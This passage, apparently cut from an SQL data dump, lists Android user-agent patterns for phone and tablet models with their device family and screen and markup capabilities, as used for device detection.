Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Infinix X559F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Infinix X571) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Infinix X572) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Infinix X603) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Infinix Zero 4 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Infinix Zero 4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Ixion EL450) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Ixion ES355) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Ixion ES550) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Ixion ES950) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Ixion M340) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Ixion M355) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Ixion M545) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Ixion M750) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Ixion M850) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Ixion ML245) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Ixion ML350) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Ixion MS255) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Ixion P350) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Ixion X150) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Ixion XL155) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; JERRY2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; JMM-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; JMM-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; JMM-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; JOY JD5546G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Joy HH5524A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; JoyPRO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":427,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Just5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; K1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; K10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; K10000 Max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; K10000 Mix) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; K10000 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; K3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; K350t) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; K3Note) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; K5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; K5000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; K6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; K6000 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; K6000 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; K7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; K8000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; KENNY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; KFKAWI) AppleWebKit/* (KHTML, like Gecko) Silk like Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; KFMUWI) AppleWebKit/* (KHTML, like Gecko) Silk like Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; KIICAA MIX) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; KIICAA POWER) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; KIW-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; KL600B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; KLIPAD_KL600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; KLIPAD_V355) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; KLIPAD_V355B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; KNT-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; KOB-L09) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; KOB-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; KOB-W09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":534,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; KYOCERA-E6820) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; KYV40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; KYV40U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; KYV41) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; KYV42) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; KYV43) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Konnect_601) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Kruger&Matz Drive 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Kylin 5.5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; Kylin_5.0S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; L-01J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; L50) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; L501) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; L502) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; L51) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; L52F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; L53) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-D620) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-D724) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-D802) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-F600K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-F600L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-F720L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-F800K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-F800L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-F800S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-H700) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 